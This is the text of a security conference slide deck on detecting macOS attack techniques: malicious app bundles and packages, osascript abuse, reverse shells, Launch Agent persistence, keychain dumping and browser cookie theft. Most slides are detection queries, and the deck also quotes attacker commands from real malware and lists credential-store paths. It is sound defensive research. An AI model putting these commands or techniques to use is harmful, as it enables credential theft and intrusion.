1 Hunting for macOS attack techniques Part 1 – Initial Access, Execution, Credential Access, Persistence Teymur Kheirkhabarov Director of Cyber Threat Monitoring, Response and Research Department, BI.ZONE Maxim Tumakov Head of Cyber Threat Research, BI.ZONE 

2 dscl . -read "/Users/$(id -un)" RealName • Director of Cyber Threat Monitoring, Response and Research Department at BI.ZONE (SOC, MDR, DFIR, TI, EDR, XDR, IRP, etc.) • Threat Hunter • ZeroNights / PHDays / OFFZONE speaker • GIAC GXPN / GCFA / GDSA certified • Ex- Head of SOC R&D at Kaspersky Lab / SOC Analyst / Infosec Admin/ IT • Twitter @HeirhabarovT • Telegram @Heirhabarov Teymur Kheirkhabarov • Head of Cyber Threat Research at BI.ZONE • Threat Hunter • Ex- Digital Forensics & Incident Response expert (Informzaschita) • Ex- Security Researcher (Kaspersky) • OSCP / eCPTXv2 certified • Telegram @mrtrumster Maxim Tumakov 

3 What we are going to talk about? 

4 What we used to prepare this talk? 

5 macOS monitoring mechanisms 

6 macOS monitoring tools 

7 Red Canary Mac Monitor 

8 Initial Access 

9 Initial Access 

10 Application Application bundles are one of the most common types of bundle created by developers. The application bundle stores everything that the application requires for successful operation *.app in MacOS ≈ C:\ProgramFiles\\ in Windows 

11 Application. Malicious document Document.pdf.app The application disguised as a PDF document Main.scpt The AppleScript launching the second stage load applet The main binary file of the application that runs the AppleScript 

12 Application. Malicious document. Let’s hunt it! dev_os_type:macos AND event_type:ProcessCreate ( cmdline.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR proc_file_path.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR proc_p_file_path.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ OR proc_p_cmdline.keyword:/.*\.(pdf|doc|docx|xls|xlsx|ppt|pptx)\.app.*/ ) Running a process with suspicious extensions 

13 Packages GUI Installer: /System/Library/PrivateFrameworks/PackageKit .framework/Versions/A/XPCServices/package_sc ript_service.xpc/Contents/MacOS/package_scri pt_service CLI Installer: /usr/sbin/installer *.pkg in MacOS ≈ *.msi in Windows Packages is a directory that contain a hierarchy of files or objects that represent a preserved, organized state. A package is displayed to users like a single file in the Finder application to avoid being changed by the user. 

14 Packages. Pre\Post install scripts Normally, pre\post install scripts are used for preparing and cleaning up software installations. The preinstall script is run before package installation and the postinstall script is run after 

15 Packages. Pre\Post install scripts. Let’s hunt it! Running a pre\post install script 1. May be noisy - must be profiled for specific infrastructure 2. Сan be used to threat hunting dev_os_type:macos AND proc_p_file_path:"/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices /package_script_service.xpc/Contents/MacOS/package_script_service" AND cmdline:("/preinstall" OR "/postinstall") AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

16 Packages. Pre\Post install scripts. Let’s hunt it! Launching child processes of pre\post install script 1. More accurate, but must be profiled for specific infrastructure too 2. Сan be used to threat hunting dev_os_type:macos AND proc_p_cmdline:("/tmp/" AND "/Scripts/" AND ("/preinstall" OR "/postinstall")) AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") If the malicious command ends with sign & then the parent process will be /sbin/launchd. The hunt does not work in this case 

17 Packages. Pre\Post install Scripts. Let’s hunt it! Starting a process from the installer's temporary directory dev_os_type:macos AND proc_cwd.keyword:/.*\/private\/tmp\/PKInstallSandbox.*/ AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

18 Packages. Distribution.xml Distribution XML file (embedded script) Distribution XML file (external script) 

19 Packages. Distribution.xml. Let’s hunt it! Distribution XML file (embedded script) dev_os_type:macos AND proc_p_file_path:"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer" AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

20 Packages. Distribution.xml. Let’s hunt it! Distribution XML file (external script) dev_os_type:macos AND proc_pp_file_path:"/System/Library/CoreServices/Installer.app/Contents/MacOS/Installer" AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

21 Packages. Installer Plugin Installer Plugin is a helper application that allows you to customize the installation panel of the main application Extra step added by Installer Plugin 

22 Packages. Installer Plugin. Let’s hunt it! A special process is used to launch a installer plugin dev_os_type:macos AND proc_p_file_path.keyword:/\/System\/Library\/CoreServices\/Installer.app\/Contents\/XPCServ ices\/InstallerRemotePluginService- (x86_64|arm64).xpc\/Contents\/MacOS\/InstallerRemotePluginService-(x86_64|arm64)/ AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

23 DMG An Apple disk image file's name usually has ".dmg" as its extension. A disk image is a compressed copy of the contents of a disk or folder. Disk images have .dmg at the end of their names *.dmg in MacOS ≈ *.iso in Windows 

24 DMG When the application is launched from DMG without installation, the application bundle will be copied to a temporary directory. This hunt detects the launch of suspicious processes from such temporary directories dev_os_type:macos AND event_type:ProcessCreate AND proc_p_cmdline:("/private/var/folders/" AND "/AppTranslocation/") AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") 

25 MS Office VBA Macro in MS Word document XLM Macro in MS Excel document 

26 MS Office. Let’s hunt it! dev_os_type:macos AND proc_p_file_path:( "/Applications/Microsoft Excel.app/Contents/MacOS/Microsoft Excel" OR "/Applications/Microsoft Word.app/Contents/MacOS/Microsoft Word" OR "/Applications/Microsoft PowerPoint.app/Contents/MacOS/Microsoft PowerPoint" ) AND -cmdline:( "/Microsoft Error Reporting.app" OR "/Microsoft AutoUpdate.app" ) VBA Macro XLM Macro 

27 MS Office. Sandbox escape MS Office macros run in the sandbox, but there is a well-known escape method: 1. Upload ~$.zip archive with .bash_profile or .zshenv to the target host 2. Create a LoginItem for the victim user 3. After reboot, Login Item will unpack the archive to the user's home directory 4. Now, every time bash/zsh is launched, a malicious load will be launched outside the sandbox context Apfell (Mythic payload) 

28 MS Office. Sandbox escape. Let’s hunt it! dev_os_type:macos AND event_type:(FileCreate OR FileDelete OR FileChange) AND proc_cwd.keyword:/.*\/Library\/Containers\/com\.microsoft\.(Word|Excel|Powerpoint)\/Data/ file_path.keyword:/.*\/\~\$.*/ To escape from the sandbox, a suspicious macro must create one or more ~$.zip files. This hunt detects manipulations with similar files 

29 Drive-by Compromise dev_os_type:macos AND event_type:ProcessCreate AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh" OR "/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript" OR "/curl") AND proc_p_file_path:( "/Applications/Safari.app/" OR "/Applications/Chrome.app/" OR "/Applications/Firefox.app/" ) Some browser exploits cause child processes to appear to perform various actions. Such a general hunt with a low FP ratio can detect traces of exploitation of such vulnerabilities 

30 Execution 

31 Execution 

32 Execution. Open Scripting Architecture (OSA) The Open Scripting Architecture (OSA) provides a standard and extensible mechanism for interapplication communication in OS X. This communication takes place through the exchange of Apple events. An Apple event is a type of interprocess message that encapsulates commands and data. Supported languages: • AppleScript • JavaScript for Automation (JXA) Launch method Description osascript -e "script here" Running one-line command osascript /path/to/script Running a script from a file #!/usr/bin/osascript Running a file with a specific header osacompile - > Mach-O Script compilation NSAppleScript, OSAScript Launch via native MacOS API NSCreateObjectFileImageFromMemory Reflective Code Loading applescript://com.apple.scripteditor?action=new&script= Open URL OSA scripts in MacOS ≈ Powershell in Windows 

33 Execution. Open Scripting Architecture (OSA) AppleScript compilation: osacompile -o compiled.app apple_script.scpt AppleScript RunOnly compilation: osacompile -x -o compiled.app apple_run_only_script.scpt Directory structure of the compiled script-application Directory structure of the compiled RunOnly script- application 

34 Execution. Open Scripting Architecture (OSA). Let’s hunt it! dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*osascript .*\.(js|scpt).*/ Running a script from a file 

35 Execution. Open Scripting Architecture (OSA). Let’s hunt it! Running suspicious commands dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*osascript .*-e.*return.*(system info|the clipboard|set popup).*/ 

36 Execution. Open Scripting Architecture (OSA). Let’s hunt it! Compiling a script via a command line utility dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:*osacompile* 

37 Execution. Open Scripting Architecture (OSA). Let’s hunt it! Downloading a file using Objective-C dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*dataWithContentsOfURL* OR *URLWithString*) 

38 Execution. Shell By default, at least 7 (?) different command shells are installed on Mac OS. Attackers can use shells to: • execution of shell-embedded commands • for launching system utilities • for initializing the reverse shell • etc 

39 Execution. Shells. Let’s hunt it! dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:( /.*\/dev\/tcp\/.*/ OR /.*\/dev\/udp\/.*/ OR /.*zsh\/net\/tcp\/.*/ OR /.*zsh\/net\/udp\/.*/ ) Attackers can use any command shell to get a reverse shell on a remote host 

Execution. Shells. Let’s hunt it! dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*base64* OR *b64decode* OR (*openssl* AND *enc* AND *-base64*)) Just like in Windows and Linux, on Mac OS attackers actively use Base64 to encode the payload 

Execution. Shells. Let’s hunt it! dev_os_type:macos AND event_type:ProcessCreate AND ( proc_file_path:"/usr/bin/nohup" OR cmdline:*nohup* ) To run processes in the background, attackers use the nohup utility, which is rarely used by legitimate applications on Mac OS 

42 Execution. Binary Mach-O, short for Mach object file format, is a file format for executables, object code, shared libraries, dynamically loaded code, and core dumps. Malicious applications often save the payload to the root of temporary directories, although legitimate applications almost never do so. dev_os_type:macos AND event_type:ProcessCreate AND proc_file_path.keyword:( /\/tmp\/[^\/]*/ OR /\/private\/tmp\/[^\/]*/ OR /\/var\/tmp\/[^\/]*/ OR /\/private\/var\/tmp\/[^\/]*/ ) Symbolic links for temporary macOS directories: • /tmp -> /private/tmp • /var -> /private/var 

43 Execution. Binary. Let’s hunt it! dev_os_type:macos AND ( ( cmdline:(*chown* OR *chmod*) AND cmdline.keyword:( /.* \/private\/tmp\/[^\/]*/ OR /.* \/tmp\/[^\/]*/ OR /.* \/private\/var\/tmp\/[^\/]*/ OR /.* \/var\/tmp\/[^\/]*/ ) ) OR ( proc_file_path:("/bin/chmod" OR "/bin/chown") AND proc_cwd.keyword:( /\/private\/tmp/ OR /\/tmp/ OR /\/private\/var\/tmp/ OR /\/var\/tmp/ ) ) ) To launch a malicious file, the attacker needs to add execution rights. This hunt detects the use of the chmod\chown utility in the root of temporary directories 

44 Execution. Interpreters dev_os_type:macos AND event_type:ProcessCreate cmdline:( (*SOCK_STREAM* AND *connect* AND *exec*) OR (*INET* AND *PeerAddr* AND *fdopen*) OR (*socket* AND *TCPSocket* AND (*exec* OR *popen*)) OR (*fsockopen* AND (*exec* OR *shell_exec* OR *system* OR *passthru* OR *popen*)) ) The accurate hunt allows to identify specific command lines to run the reverse shell 

45 Execution. Interpreters dev_os_type:macos AND event_type:ProcessCreate AND proc_file_path:("/sh" OR "/bash" OR "/dash" OR "/tclsh" OR "/ksh" OR "/tcsh" OR "/csh") AND proc_p_file_path:("/python" OR "/ruby" OR "/perl" OR "/php" OR "/osascript") Generic hunt will allow to identify suspicious activity of interpreters 

46 Execution dev_os_type:macos AND event_type:ProcessCreate AND cmdline:(*osascript* AND *curl*) dev_os_type:macos AND event_type:ProcessCreate AND cmdline.keyword:/.*curl .* -o .*(\/tmp\/|\/private\/tmp\/|\/private\/var\/tmp\/).*/ 

47 Persistence 

48 macOS Persistence 

49 macOS persistence management – what’s new in Ventura • With Ventura, comes a the new login and background item management features • This new feature helps users see what is running in the background of their Mac, the invisible becomes visible • So, now users can see which apps are set up for persistence without having to find search directories in the Finder, use the Terminal, or relying on 3rd party software Users can now manage Login Items, Launch Agents and Launch Daemons all from a single place in System Settings Also when new Launch Agent, Launch Daemon or Login Item is added, the system now generates a notification alert Login items Launch Agents / Daemons 

50 macOS persistence management – 3rd party tools BlockBlock monitors common persistence locations and alerts whenever a persistent component is added. KnockKnock performs inventory of common persistence location an allows uncovers persistently installed software 

51 • Launch Daemons are background processes that run with root privileges and executes when system is started • Launch Daemons use property list files defined in the: • /System/Library/LaunchDaemons/*.plist (SIP protected) • /Library/Apple/System/Library/LaunchDaemons/*.plist (SIP protected) • /Library/LaunchDaemons/*.plist (only root has access) T1543.001 – Create or Modify System Process: Launch Agent T1543.004 – Create or Modify System Process: Launch Daemon • Launch Agents are per-user background processes that only execute while the user is logged in • Launch agents are defined in property list files that are in: • /System/Library/LaunchAgents/*.plist (SIP protected) • /Library/Apple/System/Library/LaunchAgents /*.plist (SIP protected) • /Library/LaunchAgents/*.plist (only root has access) • /Users/$username/Library/LaunchAgents/*.plist ($username has access) 

52 • Can be anywhere on a macOS system. • Three formats – XML, JSON (Dictionary) or binary blobs • Used to store configuration settings, permissions, preferences, etc • Usually named in reverse DNS notation (com.apple.thing) • From an offensive perspective, they come into play for: • Persistence (Launch Agents/Launch Daemons) • Evasion (Entitlements, Application’s Info.plist) • Situational Awareness (/Library/Receipts/InstallHistory.plist) • Launch Agent / Launch Daemon plists must conform to the launchd format. Important Keys: • Label – a unique string that identifies the agent • ProgramArguments – the arguments used to launch the agent • RunAtLoad – start the agent when the property list file is loaded by launchd Property List Files (PLIST) 

53 Hunting for suspicious Launch Agents/Daemons 

54 Hunting for suspicious Launch Agents/Daemons What telemetry we need? • Process Creation monitoring • Process Inventory • Console Commands monitoring • Console Commands History • File Creation monitoring • File Change monitoring • File Inventory • Launch Agents/Launch Daemons inventory • Launch Items inventory 

55 Downloading Launch Agent/Daemon PLIST by console tool OSX.CreativeUpdate: OSX.Siggen: Some macOS malware, that combines EmPyre backdoor and XMRig miner It is quite common for malware or adversaries to download Launch Agents/Daemons PLIST files using standard tools like curl 

56 Search for command lines that contain combinations of standard downloading tools (like curl) and paths to the Launch Agents/Daemons PLIST files location: dev_os_type:macos AND cmdline:*curl* AND (cmdline:("*/LaunchAgents/*" OR "*/LaunchDaemons/*") OR cmdline.keyword:*.plist*) AND -cmdline:("*/homebrew/Library/Homebrew/*") Downloading Launch Agent/Daemon PLIST by console tool Let’s hunt it! 

57 Downloading Launch Agent/Daemon PLIST by console tool Let’s hunt it! Search for PLIST files creation or modification by curl or script interpreters: dev_os_type:macos AND event_type:(FileCreate OR FileChange) AND proc_file_path:(*curl* OR *osascript* OR *python* OR *perl* OR *ruby*) AND (file_path.keyword:*.plist OR file_path:("*/LaunchAgents/*" OR "*/LaunchDaemons/*")) -proc_cmdline:("*/homebrew/Library/Homebrew/*") 

58 Building Launch Agent/Daemon PLIST from the command line Silver Sparrow and UpdateAgent malware use PlistBuddy in direct mode to add arguments to a PLIST file: VPN Trojan (Covid) malware creates PLIST file using echo command: 

59 Building Launch Agent/Daemon PLIST from the command line Let’s hunt it! Search for usage of PlistBuddy or echo to create/modify PLIST: cmdline:("echo *" OR *PlistBuddy*) AND cmdline:(*RunAtLoad* OR *ProgramArguments*) AND -(proc_cwd:"*/Library/InstallerSandboxes/.PKInstallSandboxManager/*" OR proc_cwd.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/ OR proc_p_cmdline:"*/Library/InstallerSandboxes/.PKInstallSandboxManager/*" OR proc_p_cmdline.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/) 

60 Decode the content of PLIST from base64 Another trick that commonly used by malware is to decode the content of PLIST file from base64 encoded string. Bellow there is example from macOS.GMERA malware: 

61 Decode the content of PLIST from base64. Let’s hunt it! Search for command lines that contain combinations of base64 substring and paths to the Launch Agents/Daemons PLIST files location: dev_os_type:macos AND cmdline:(*base64*) AND (cmdline:("*/LaunchAgents/*" OR "*/LaunchDaemons/*") OR cmdline.keyword:*.plist*) 

• Calisto malware adds property list file in LaunchAgents using ‘cp’: Other ways to create malicious Launch Agent/Daemon PLIST files – mv, cp, touch, zip commands • Dummy malware adds property list file in LaunchDaemons using ‘mv’: • HiddenLotus uses ‘touch’ to create property list file in LaunchDaemons 

63 Suspicious Launch Agent/Daemon PLIST files Masquerading as a system service (PLIST file name contains: ”com.apple.*”) : Adversaries may attempt to manipulate the name of PLIST file to make it appear legitimate or benign: • ~/Library/LaunchAgents/com.apple.spx.plist • ~/Library/LaunchDaemons/com.apple.acc.installer.v1.plist • ~/Library/LaunchAgents/com.apple.softwareupdate.plist • ~/Library/LaunchAgents/com.apple.spx.plist • ~/Library/LaunchAgents/com.apple.HYQ.plist • ~/Library/LaunchAgents/com.apple.2KR.plist • ~/Library/LaunchAgents/com.apple.Yahoo.plist • ~/Library/LaunchAgents/com.apple.Google.plist • /Library/LaunchAgents/com.apple.update.plist • ~/Library/LaunchAgents/com.apple.abtpd.plist • /Library/LaunchDaemons/com.apple.abtpd.plist • ~/Library/LaunchAgents/com.apple.Safari.proxy.plist • ~/Library/LaunchAgents/com.apple.Safari.pac.plist • /Library/LaunchDaemons/com.apple.marcoagent.voiceinstallerd.plist • ~/Library/LaunchAgents/com.apple.marcoagent.voiceinstaller.plist • ~/Library/LaunchAgents/com.apple.appstore.checkupdate.plist • ~/Library/LaunchAgents/com.apple.usagestatistics.plist • ~/Library/LaunchAgents/com.apple.iCloud.sync.daemon.plist • /Library/LaunchDaemons/.com.apple.WindowServer.plist • /Library/LaunchAgents/.com.apple.upd.plist • ~/Library/LaunchAgents/.com.apple.system.plist • ~/Library/LaunchAgents/ com.appIe.stockf.stocks • ~/Library/LaunchAgents/ com.appIe.stockfolioses.Stockfoli PLIST file name looks similar to ”com.apple” : Hidden PLIST file (name starts with dot): • ~/Library/LaunchAgents/com.uptodatemac.upd.agent.plist • ~/Library/LaunchAgents/MacOSupdate.plist • ~/Library/mdworker/MacOSupdate.plist Masquerading as macOS update service: • ~/Library/k.plist • ~/Library/LaunchAgents/a.plist • ~/Library/LaunchAgents/1.plist Too short PLIST file name: 

64 Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it! Search for PLIST files looking like legitimate system services, but located not in typical for system Launch Agents/Daemons folders: dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*")AND file_path:(*com.apple* OR *com.appie* OR (*update* AND *mac*) OR (*update* AND *system*)) -file_path:("/Library/Apple/System/Library/LaunchAgents/*" OR "/Library/Apple/System/Library/LaunchDaemons/*" OR "/System/Library/LaunchDaemons/*" OR "/System/Library/LaunchAgents/*") 

65 Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it! Search for PLIST files with short names: dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*") AND file_path.keyword:/.+\/.{1,3}.plist/ 

66 Search for hidden PLIST files: dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND file_path:("*/Library/LaunchAgents/*" OR "*/Library/LaunchDaemons/*") AND file_path.keyword:/.+\/\..+/ AND -proc_file_path:"/Library/Application Support/AirWatch/hubd" Suspicious Launch Agent/Daemon PLIST files. Let’s hunt it! 

67 Hunting for suspicious Launch Agents/Daemons 

68 Hunting suspicious PLIST targets – Telemetry Osquery launchd table KnockKnoc command line scan with output to a file: 

69 Xloader stealer Launch Agent starts file from hidden folder (.URzH) OSX.LamePyre backdoor starts two hidden files (.system and .helper) Hidden files or files from hidden folders as Launch Agent/Daemon targets 

70 Hidden files or files from hidden folders as Launch Agent/Daemon targets. Let’s hunt it! Search for Launch Agents and Launch Daemons that start hidden files or files from hidden folders: sensor_type:osquery AND rule_name:"pack_inventory_launchd" AND service_autorun:true AND file_path.keyword:/.+\/\..+/ 

71 Search for Launch Agents and Launch Daemons that start files from temporal folders: sensor_type:osquery AND rule_name.keyword:"pack_inventory_launchd" AND service_autorun:true AND file_path:("/tmp/*" OR "/var/tmp/*" OR "/private/var/tmp/*" OR "/private/tmp/*" OR "*/etc/*") Files from temporal folder as Launch Agent/Daemon targets Let’s hunt it! 

72 Search for execution of files from temporal folders with /sbin/launchd as a parent: dev_os_type:macos AND event_type:(ProcessCreate OR ProcessInfo) AND proc_p_file_path:"/sbin/launchd" AND proc_file_path:("/tmp/*" OR "/var/tmp/*" OR "/private/var/tmp/*" OR "/private/tmp/*" OR "*/etc/*") AND -proc_file_path.keyword:/.+\/tmp\/PKInstallSandbox\.[0-9A-Za-z]+\/Scripts\/.+/ Files from temporal folder as Launch Agent/Daemon targets Let’s hunt it! 

73 OSX.Siggen – a fake WhatsApp Trojan. The Launch Agent is downloaded via curl and starts bash script XcodeSpy is a malicious Xcode project that installs a custom variant of the EggShell backdoor and uses Launch Agent as a persistence mechanism that starts bash Script interpreters or shells as Launch Agents/Daemons targets 

74 WildPressure malware decodes the XML, fills [pyscript] placeholder with the path to the python script and drops .plist file for persistence Silver Sparrow sets up persistence with the Launch Agent that starts /bin/sh Script interpreters or shells as Launch Agents/Daemons targets 

75 OSX.ppminer – the trojan installs Launch Agent that starts compiled AppleScript using osasscript tool Script interpreters or shells as Launch Agents/Daemons targets CrossRAT persists as a Launch Agent that starts .jar file using java interpreter 

76 Search for Launch Agents and Launch Daemons that start interpreters: dev_os_type:macos AND sensor_type:osquery AND rule_name:"pack_inventory_launchd" AND service_autorun:true AND (cmdline:(*bash* OR *zsh* OR *ksh* OR *tcsh* OR *dash* OR *tclsh* OR *fish* OR "*/bin/sh*" OR *perl* OR *ruby* OR *python* OR *osascript* OR *javascript* OR *curl* OR *wget* OR *java*) OR file_path.keyword:(*.sh OR *.bash OR *.py OR *.pl OR *.rb OR *.scpt OR *.scptd OR *.jar)) Launch Agents/Daemons that start interpreters. Let’s hunt it! 

77 T1547.015 – Boot or Logon Autostart Execution: Login Items • Login items are launched when the user logs in, and continue running until the user logs out or manually quits them • There are two ways to add a login item: using the Service Management framework, and using a shared file list • Shared file list login items can be set using scripting languages such as AppleScript or LSSharedFileListInsertItemURL API, whereas the Service Management Framework uses the API call SMLoginItemSetEnabled. • The entries of "Login Items" are stored in: • ~/Library/Preferences/com.apple.loginitems.plist - before High Sierra • ~/Library/Application Support/ com.apple.backgroundtaskmanagementagent/ backgrounditems.btm – since High Sierra • /private/var/db/com.apple.backgroundtaskmanagement/BackgroundItems- v*.btm (for example, BackgroundItems-v7.btm) – since Ventura • Since macOS 13 Ventura when a Login Item is added, the system generates a notification alert : Before macOS 13 Ventura Since macOS 13 Ventura 

78 T1547.015 – Boot or Logon Autostart Execution: Login Items OSX/Dok utilizes AppleScript to create the Login Item named “AppStore”: Apfell Mythic framework agent has command persist_loginitem_allusers that add a login item for all users via the LSSharedFileListInsertItemURL: 

79 Create Login Item using osascript. Let’s hunt it! Search for osascript usage to create Login Item: dev_os_type:macos AND cmdline:*osascript* AND cmdline:"*System Events*" AND cmdline:"*login item*" AND cmdline:*path* AND -proc_p_cmdline:*PKInstallSandbox* 

80 Generic detection of Login Items creation/deletion Modification of Background Items database file can be the sign of Login Item creation/deletion: dev_os_type:macos AND event_type:FileChange AND file_path:(*BackgroundItems* OR "*/com.apple.loginitems.plist") 

81 Search for recently created non signed files started by launchd – can be the sign of newly created Launch Agent, Launch Daemon or Login Item: dev_os_type:macos AND event_type:ProcessCreate AND proc_p_file_path:"/sbin/launchd" AND proc_file_age:<600 AND -proc_file_sig_result:good Generic detection of suspicious Launch Agents, Launch Daemons or Login Items 

82 Credential Access 

macOS Credential Access 

Spoofing credentials dialog using AppleScript (osascript) MacStealer uses standard osasscript tool to show fake password prompts for gathering credentials: Atomic Stealer uses a crude but effective means of extracting the user’s login password via AppleScript spoofing: 

Spoofing credentials dialog using AppleScript. Attack Flow 1. Show spoofed credentials dialog box 2. Check entered password using sudo or dscl comands 3. Repeatedly shows spoofed credentials dialog box until the correct password is supplied 

86 Spoofing credentials dialog with osascript. Let’s hunt it! Search for osascript usage to spoof credentials dialog: dev_os_type:macos AND cmdline:*osascript* AND cmdline:"*display dialog*" AND cmdline:(*password* OR *пароль* "*hidden answer*") 

87 Checking passwords via sudo or dscl. Let’s hunt it! Search for sudo and dscl tool usage to check password: dev_os_type:macos AND ( cmdline.keyword:/.*echo .+\|.*sudo \-S .+/ OR (cmdline:*dscl* AND cmdline:*authonly*) ) AND -cmdline:*ssh* 

88 Metasploit password_pompt_spoof module osx/gather/password_prompt_spoof msf module drops script to hidden folder inside /tmp and executes it with ossascipt tool 88 

Metasploit password_pompt_spoof module. Let’s hunt it! 89 Search for usage of osascript tool to run scripts from tmp: dev_os_type:macos AND((cmdline.keyword:(/.*osascript .{0,10}\/tmp\/.+/ OR /.*osascript .{0,10}\/var\/tmp\/.+/ OR /.*osascript .{0,10}\/private\/var\/tmp\/.+/)) OR (event_type:(ProcessCreate OR ProcessInfo) AND cmdline:*osascript* AND proc_cwd:*tmp*) ) 

Spoofing credentials dialog using API calls It is possible to spoof credentials dialog via NSAAlert API calls. Bellow there is an example from Swift-Attack testing tools: 90 

Keychain – wtf? • The infrastructure and a set of APIs used by Apple operating systems and third-party apps to store and retrieve passwords, keys and other sensitive credentials • Applications need to handle secure information, such as keys and login tokens. The keychain provides a secure way to store these items – it is like DPAPI on Windows hosts • There are three types of Keychains: Login Keychain, System Keychain, and Local Items (iCloud) Keychain • The Login Keychain stores user passwords and information: • ~/Library/Keychains/login.keychain-db (but may differ) • The System Keychain stores items accessed by the operating system, such as items shared among users on a host: • /Library/Keychains/System.keychain • The Local Items (iCloud) Keychain is used for items synced with Apple’s iCloud service • Native tools for interacting with Keychains – security (CLI), Keychain Access (GUI) 91 “Keychain Access is a macOS app that stores your passwords and account information, and reduces the number of passwords you have to remember and manage.” - Apple 

Keychain Dumping 92 

Grab Keychain files Meterpreter enum_osx post-exploitation module get Keychains file using cat command (/bin/cat "/Users/name/Library/Keychains/login.keychain-db): Atomic Stealer steal the user’s keychain contents. A process called ‘unix1’ is spawned in memory to obtain the keychain.: 93 

OSX/Proton backdoor collects user Keychains using zip command (zip -r %@/KC.zip ~/Library/Keychains/ /Library/Keychains/;): Calisto trojan is able to steal the contents of Keychain and archive it using zip command: 94 Grab Keychain files 

95 Metasplot enum_osx module Search for Keychains paths or well-known Keychain dumping tools names in the command line: cmdline:("*/Library/Keychains/*" OR "*login.keychain*" OR "*System.keychai*" OR "*keychain_dumper*" OR *libkeystealClient* OR *chainbreaker* OR *keychaindump* OR "*dump-keychain*") AND -proc_file_path:"/usr/bin/security" AND -cmdline:("*/usr/bin/security*" OR *chown* OR *chmod*)AND -cmdline.keyword:(/ls .+/ OR /cd .+/ OR /.*security .+/) Grab Keychain files. Let’s hunt it! 

96 Grab Keychain files. Let’s hunt it! Search for files whose names contain the word ”keychain” or names of the well-known Keychain dumping tools: dev_os_type:macos AND event_type:(FileCreate OR FileInfo) AND file_path:(*keychain* OR *chainbreaker*) AND -file_path:(”/usr/local/bin/git-credential-osxkeychain" OR ”/usr/sbin/systemkeychain" OR ”/usr/local/bin/docker-credential-osxkeychain" OR "*/Library/Keychains*") 

Dumping of Keychain content via Security command ”security dump-keychains” command can be used to dump the content of the keychain storage data : 97 

98 Dumping of Keychain Content via Security Command Let’s hunt it! Search for security tool usage with dump-keychain option: dev_os_type:macos AND cmdline:*security* AND cmdline:"*dump-keychain*" AND cmdline.keyword:(/.+ \-d.*/ OR /.+ \-r.*/) 

Browsers cookies and credentials theft Cookies storage locations: • Chrome: ~/Library/Application Support/Google/Chrome/Default/Cookies • Firefox:~/Library/ApplicationSupport/Firefox/Profiles/*.default/cookies.sqlite • Safari: ~/Library/Safari/LocalStorage/*, ~/Library/Cookies/* Credentials storage locations: • Chrome:~/Library/Application Support/Google/Chrome/Default/Login Data • Firefox:~/Library/ApplicationSupport/Firefox/Profiles/*.default/login.json" • Safari: ~/Library/Safari/Form Values/* Credentials from Password Stores: Credentials from Web Browsers Steal Web Session Cookie • Browser cookies and saved passwords are highly valuable to attackers • Stolen cookies and passwords can be used to gain access to internal/external applications 99 

Browsers cookies and credentials theft examples OSX/Proton collects private browser data using zip command: XCSSET safari_cookie module thefts Safari cookie using scp command: 10 0 

10 1 Browsers cookies theft. Let’s hunt it! Search for paths to the browser cookies storage in the command lines: dev_os_type:macos AND cmdline:("*/Library/Cookies*" OR ("*/Firefox/Profiles/*" AND "*cookies.sqlite*") OR "*/Library/Application Support/Google/Chrome/Default/Cookies*" OR "*/Google/Chrome Beta/Default/Cookies*" OR "*/Chromium/Default/Cookies*" OR "*/Microsoft Edge/Default/Cookies*" OR "*/BraveSoftware/Brave- Browser/Default/Cookies*" OR "*/com.operasoftware.Opera/Default/Cookies*" OR "*/com.operasoftware.OperaGX/Default/Cookies*" OR "*/Vivaldi/Default/Cookies*" OR "*/Coccoc/Default/Cookies*" OR "*/Yandex/YandexBrowser/Default/Cookies") 

